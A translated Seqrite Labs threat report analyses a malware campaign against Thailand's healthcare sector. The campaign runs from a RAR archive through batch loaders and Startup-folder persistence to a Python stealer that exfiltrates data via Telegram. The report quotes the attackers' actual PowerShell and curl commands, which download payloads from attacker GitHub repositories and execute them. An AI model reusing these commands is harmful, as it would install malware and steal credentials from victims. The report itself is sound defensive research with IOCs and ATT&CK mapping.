• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Технические  Злоумышленники используют архивы RAR в качестве оружия для нападения на сектор здравоохранения Таиланда.
Злоумышленники используют архивы RAR в качестве оружия для нападения на сектор здравоохранения Таиланда.
19 июнь 2026

Злоумышленники используют архивы RAR в качестве оружия для нападения на сектор здравоохранения Таиланда.

Написано Вайбхав Билладе
Вайбхав Билладе
Технические

Авторы: Вайбхав Крушна Билладе, Диксит Панчал и Румана Сиддики.

Содержание

  • Введение
  • Ключевые цели
  • Цепочка заражения
  • Предварительные результаты кампании
  • Технический анализ
    • Этап 1: Первоначальная доставка (архив RAR)
    • Этап 2: Загрузчик пакетных файлов с обфускацией Rouki
    • Этап 3: Скрипт обеспечения постоянного доступа при запуске
    • Этап 4: Выполнение вторичной полезной нагрузки
    • Этап 5: Развертывание программы для кражи информации (sim.py)
  • Заключение
  • Seqrite Покрытие
  • Индикаторы компрометации (IOC)
  • MITRE ATT&CK Картографирование

Введение

Seqrite Лаборатория активно отслеживает и анализирует субъектов угроз и их кампании, уделяя особое внимание установлению авторства, анализу инфраструктуры и методам противодействия. В ходе наших исследований мы установили причастность многочисленных операций к действиям групп угроз, связанных с Китаем, и других групп, нацеленных как на региональные, так и на международные структуры.

В ходе недавнего расследования мы выявили активную кампанию вредоносного ПО, нацеленную на сектор здравоохранения Таиланда, включая персонал Министерства здравоохранения и связанные с ним медицинские организации. Кампания использует фишинговые приманки на медицинскую тематику, распространяемые через вредоносные RAR-архивы, содержащие обфусцированные пакетные скрипты и исполняемые полезные нагрузки. Цепочка заражения включает в себя несколько этапов обфускации, доставку полезной нагрузки через GitHub, механизмы обеспечения устойчивости и вредоносное ПО для кражи информации, предназначенное для закрепления в целевых средах, избегая при этом обнаружения.

Ключевые цели

Кампания в первую очередь нацелена на персонал и подразделения всей системы здравоохранения Таиланда, включая:

  • Сотрудники Министерства здравоохранения и государственные группы по закупкам медицинского оборудования используют подставных лиц, выдавая себя за владельцев официальных документов, подтверждающих разрешение на использование медицинского оборудования.
  • Сотрудники администрации больницы использовали поддельные документы о госпитализации пациентов.
  • Сотрудники радиологических и стоматологических клиник используют поддельные медицинские карты и файлы запросов рентгеновских снимков.
  • Клинические и радиологические отделения используют поддельные документы с результатами компьютерной томографии пациентов.
  • Команды по организации цепочки поставок в сфере здравоохранения и закупке медицинского оборудования работают с использованием документов, одобренных Министерством здравоохранения.

Выявленные привлекательные темы указывают на целенаправленное воздействие на функции, связанные со здравоохранением, и демонстрируют глубокое понимание операционных процессов в этом секторе.

Цепочка заражения

RAR-архив → Загрузчик BAT с обфускацией → Загрузчик полезной нагрузки с обфускацией Rouki → Скрипт обеспечения постоянного присутствия при запуске (WindowSecuryt.bat) → Вторичная пакетная полезная нагрузка (u-t2.bat) → Похититель информации на основе Python (sim.py) → Попытки утечки данных из Telegram

 

Предварительные результаты кампании

Самый ранний идентифицированный образец, связанный с кампанией, был загружен 7 апреля 2026 года, а самый последний наблюдаемый образец был загружен 3 июня 2026 года, что указывает на активный оперативный период продолжительностью приблизительно десять недель на момент анализа.

Ключевые наблюдения

  • Все идентифицированные образцы были загружены из Таиланда, что указывает на использование внутренней инфраструктуры для подготовки образцов или на наличие проблем в местных системах распространения.
  • Злоумышленник распространяет вредоносное ПО через RAR-архивы, содержащие вредоносные пакетные скрипты и исполняемые файлы, замаскированные под документы, связанные со здравоохранением и государственным управлением.
  • Названия файлов-приманок адаптированы к конкретным должностным функциям, включая административный, клинический, радиологический и закупочный персонал, что указывает либо на предварительную разведку медицинских организаций, либо на широкую стратегию целевого воздействия, основанную на знаниях, специфичных для данной отрасли.
  • Во всех наблюдаемых образцах используется согласованная цепочка выполнения RAR → BAT → Полезная нагрузка, что указывает на стандартизированный набор инструментов и воспроизводимую методологию доставки.

Технический анализ

Этап 1: Первоначальная доставка (архив RAR)

Первоначальный вектор заражения состоит из вредоносного RAR-архива, содержащего обфусцированный пакетный файл, который функционирует как загрузчик первого этапа. Обфускация широко используется для сокрытия функциональности и затруднения статического анализа.

Один из обнаруженных примеров, Health_Ministry_Approved_Equipment_2026.bat, создает временный файл, содержащий закодированные данные полезной нагрузки, и использует PowerShell для декодирования встроенного содержимого. Затем декодированное содержимое записывается во вторичный пакетный файл, который впоследствии выполняется.

После казни временные артефакты удаляются, чтобы уменьшить количество улик, представляющих угрозу для жизни человека, и осложнить расследования после компрометации.

Использование встроенных данных полезной нагрузки, процедур декодирования на основе PowerShell и операций очистки указывает на преднамеренные попытки скрыть вредоносную функциональность и обойти средства защиты.

Этап 2: Загрузчик пакетных файлов с обфускацией Rouki

Расшифрованный файл payload.bat, запущенный на первом этапе, был сильно обфусцирован с использованием фреймворка, идентифицированного как Rouki.

Анализ показал, что скрипт динамически восстанавливает и выполняет команды PowerShell, которые загружают, сохраняют и запускают дополнительные компоненты вредоносного ПО. Использование размещенных на GitHub полезных нагрузок, обманчивых расширений файлов и многоэтапного выполнения обеспечивает операционную гибкость, одновременно снижая вероятность обнаружения.

Команда PowerShell 1 – Развертывание для обеспечения постоянного доступа

powershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');”

Эта команда загружает удаленно размещенный файл, замаскированный под изображение PNG, и сохраняет его как WindowSecuryt.bat в папке автозагрузки Windows.

Размещение в каталоге автозагрузки обеспечивает автоматическое выполнение при каждом входе пользователя в систему, тем самым гарантируя сохранение данных на постоянной основе.

Команда PowerShell 2 – Развертывание полезной нагрузки

powershell.exe -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip”

Эта команда загружает ZIP-архив, извлекает его содержимое в общедоступную директорию и выполняет встроенную полезную нагрузку на основе Python (sim.py) с помощью встроенного интерпретатора Python.

После выполнения ZIP-архив удаляется, чтобы минимизировать количество артефактов, представляющих интерес для криминалистического анализа, и затруднить реагирование на инцидент.

Этап 3: Скрипт обеспечения постоянного доступа при запуске (WindowSecuryt.bat)

Анализ загруженного скрипта WindowSecuryt.bat показал, что он содержит значительное количество ненужных данных и логики обфускации, аналогичной той, что наблюдалась в пакетных загрузчиках на более ранних этапах разработки. Это нефункциональное содержимое предназначено для того, чтобы затруднить статический анализ и скрыть истинный ход выполнения скрипта.

После выполнения скрипт проводит проверку привилегий и настройку среды, прежде чем перейти к заключительному функциональному этапу, где он восстанавливает и выполняет следующую команду:

cmd /c “curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat”

Эта команда использует curl для загрузки дополнительного пакетного файла (u-t2.bat) из репозитория, размещенного на GitHub, и сохраняет его во временном каталоге системы (%TEMP%). Использование пути %TEMP% обеспечивает доступ на запись без необходимости предоставления повышенных прав в большинстве сред.

После успешной загрузки скрипт немедленно запускает полезную нагрузку с помощью команды вызова, обеспечивая продолжение многоступенчатой ​​цепочки заражения.

Сочетание сохранения активности в папке автозагрузки и удаленно загружаемых полезных нагрузок позволяет злоумышленнику обновлять вредоносный функционал, не изменяя исходный механизм сохранения активности.

Кроме того, размещение скрипта в папке автозагрузки Windows обеспечивает его постоянное выполнение при входе пользователя в систему. Это позволяет злоумышленнику многократно получать и запускать обновленные полезные нагрузки из удаленной инфраструктуры GitHub без изменения исходного механизма постоянного присутствия, что обеспечивает гибкий и долгосрочный контроль над цепочкой заражения.

Этап 4: Выполнение вторичной полезной нагрузки (u-t2.bat)

Анализ загруженного скрипта u-t2.bat показал, что он содержит мусорный код и обфусцированные участки, аналогичные более ранним компонентам пакетной обработки в цепочке заражения. Эти нефункциональные элементы появляются в начале скрипта и предназначены для того, чтобы затруднить статический анализ и скрыть фактический ход выполнения. Логика, имеющая смысл, скрыта глубже в этих обфусцированных сегментах и ​​разрешается только во время выполнения.

Скрипт пытается перезапуститься с повышенными привилегиями, чтобы получить доступ к системе на более высоком уровне.

После успешного повышения привилегий скрипт переходит к выполнению следующего этапа полезной нагрузки, сводя к минимуму видимость для пользователя.

На заключительном этапе выполнения запускается следующая полезная нагрузка:

powershell.exe -WindowStyle Hidden -Command “C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py”

Эта команда запускает ранее развернутый интерпретатор Python и выполняет файл sim.py, при этом скрывая видимые окна выполнения.

Использование встроенной среды выполнения Python позволяет запускать программу независимо от существующей установки Python в целевой системе и снижает зависимость от развертывания.

Этап 5: Развертывание программы для кражи информации (sim.py)

В ходе анализа была выявлена ​​последняя полезная нагрузка — sim.py, программа для кражи информации на основе Python, запускаемая через встроенную среду Python.

После запуска вредоносная программа завершает работу нескольких веб-браузеров, включая Google Chrome, Microsoft Edge, Brave и другие браузеры на основе Chromium, используя команды taskkill. Такое поведение обычно связано с вредоносными программами, стремящимися получить доступ к базам данных браузеров, хранилищам учетных данных, файлам cookie и артефактам сеансов, которые в противном случае могут быть заблокированы активными процессами.

Наблюдаемые возможности

  • Собирает данные, связанные с браузером.
  • Сборщик данных хранит учетные данные и информацию о сеансах.
  • На этапах данные собирались во временных каталогах.
  • Сжимает собранные данные в ZIP-архивы.
  • Попытки утечки данных через инфраструктуру на основе Telegram.

Анализ журналов выполнения выявил неоднократные попытки передачи украденных данных в контролируемые злоумышленниками каналы Telegram с использованием жестко закодированных токенов бота и идентификаторов чатов через API бота Telegram.

Запросы на эксфильтрацию содержали метаданные, относящиеся к конкретным жертвам, такие как:

  • Системные идентификаторы
  • Информация об имени пользователя
  • Счетчики собранных данных
  • Архивные ссылки

Хотя зафиксированные попытки утечки данных не увенчались успехом из-за таймаутов подключения при обмене данными с api.telegram.org, сочетание сбора данных из браузера, локального развертывания, создания архива и попытки передачи подтверждает возможности вредоносной программы по краже информации.

В целом, вредоносная программа демонстрирует характеристики, обычно ассоциируемые с современными программами-похитителями на основе Python, включая кражу учетных данных, сбор сессионных cookie, локальное размещение данных, генерацию архивов и механизмы эксфильтрации на основе Telegram.

Использование доставки полезной нагрузки через GitHub, легитимных системных утилит, многоуровневой обфускации и многоэтапного выполнения способствует как оперативной гибкости, так и обходу средств защиты.

Заключение

Seqrite Лаборатория с умеренной степенью уверенности оценивает, что эта кампания представляет собой целенаправленную атаку на сектор здравоохранения Таиланда с использованием методов социальной инженерии, связанных со здравоохранением, многоступенчатых пакетных загрузчиков, инфраструктуры полезной нагрузки, размещенной на GitHub, и вредоносного ПО на основе Python для кражи информации.

В ходе кампании была продемонстрирована повторяемая методика доставки, включающая RAR-архивы, сильно обфусцированные пакетные скрипты, обеспечение постоянного присутствия в системе за счет злоупотребления папкой автозагрузки, поэтапное извлечение полезной нагрузки и попытки эксфильтрации данных через Telegram.

Хотя на основании имеющихся данных невозможно установить окончательную причастность, наблюдаемая оперативная согласованность между выборками предполагает, что деятельность осуществляется одним субъектом угроз или тесно связанной с ним группой. Дальнейший мониторинг соответствующей инфраструктуры, эволюции полезной нагрузки и жертв может дать дополнительные сведения о причастности и целях кампании.

Организациям в секторе здравоохранения следует сохранять бдительность в отношении фишинговых кампаний, связанных с документами, отслеживать несанкционированные изменения в папке автозагрузки и ограничивать выполнение ненадежных скриптов и исполняемых файлов, полученных из внешних источников.

Seqrite Покрытие:

  • Script.Trojan.Downloader.50836.GC
  • cld.script.trojan.1759432951

Индикаторы компрометации (IOC):

Название файла SHA256
Оборудование, одобренное Министерством здравоохранения в 2026 году.rar E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B
Оборудование, одобренное Министерством здравоохранения в 2026 году.bat 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0
payload.bat F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87
WindowSecuryt.bat 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183
u-t2.bat 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9
Рабочие столы.zip 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80
Похититель (SIM.PY) 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865

 

MITRE ATT&CK Mapping:

тактика Название техники Идентификатор техники
Первоначальный доступ Фишинг: фишинговое вложение T1566.001
Типы Интерпретатор команд и сценариев: командная оболочка Windows T1059.003
Интерпретатор команд и сценариев: PowerShell T1059.001
Пользовательское выполнение: вредоносный файл T1204.002
Уклонение от защиты Замаскированные файлы или информация T1027
Маскировка (BAT, замаскированный под PNG/TXT) T1036
Удаление индикатора на хосте: удаление файла T1070.004
Настойчивость Ключи запуска реестра / Папка автозагрузки T1547.001
Запланированное выполнение через папку автозагрузки T1547
Повышение привилегий Механизм контроля за повышением уровня злоупотреблений T1548
Дискавери Обнаружение владельца системы/пользователя T1033
Доступ к учетным данным Учетные данные из хранилищ паролей T1555
Учетные данные из веб-браузеров T1555.003
‎ Архивировать собранные данные T1560
Данные из локальной системы T1005
Данные из информационных хранилищ T1213
Управление и контроль Ingress Tool Transfer (полезные нагрузки, размещенные на GitHub) T1105
Протокол прикладного уровня: веб-протоколы (HTTPS) T1071.001
Прокси через легитимные сервисы (GitHub) T1102
эксфильтрации Эксфильтрация через веб-сервис (API Telegram Bot) T1567
Эксфильтрация данных в облачное хранилище/веб-сервис T1567.002

 

 предыдущий постКак управляется Digital Risk Protection Services Снижение киберрисков
Следующий пост  Что представляет собой услуга защиты от цифровых рисков для предприятий: полный обзор...
Вайбхав Билладе

О Вайбхаве Билладе

...

Статьи Вайбхава Билладе »

Похожие статьи

  • Злоупотребление проверенными бизнес-процессами: многоэтапная кампания по краже данных из-за чужих ресурсов.

    Июль 22, 2026
  • За кулисами возврата средств: от фишинга GST до RAT-программы Remcos через многоступенчатую цепочку заражения .NET.

    Июль 17, 2026
  • Операция ShadowRecruit: Кампания по распространению вредоносного ПО, ориентированная на поиск работы и использующая ControlR и Google Sheets для атаки на соискателей из Индии.

    Июль 14, 2026
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (341) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (113) Безопасность предприятия (20) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (14) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (17) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (14) Threat Intelлигенция (21) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации